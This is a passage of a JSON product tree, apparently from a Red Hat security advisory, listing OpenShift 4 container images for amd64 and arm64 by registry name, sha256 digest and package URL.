"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3Abcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cloud-controller-manager-rhel9@sha256%3Afdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cluster-api-controllers-rhel9@sha256%3A75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557337"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Abde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3Aa97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3Aa116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-csi-driver-syncer-rhel9@sha256%3A0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-problem-detector-rhel9@sha256%3A0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3Af1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775559294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557242"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Ae61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Ae3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Ab508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Ac2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Acd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3Ac180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"product": {
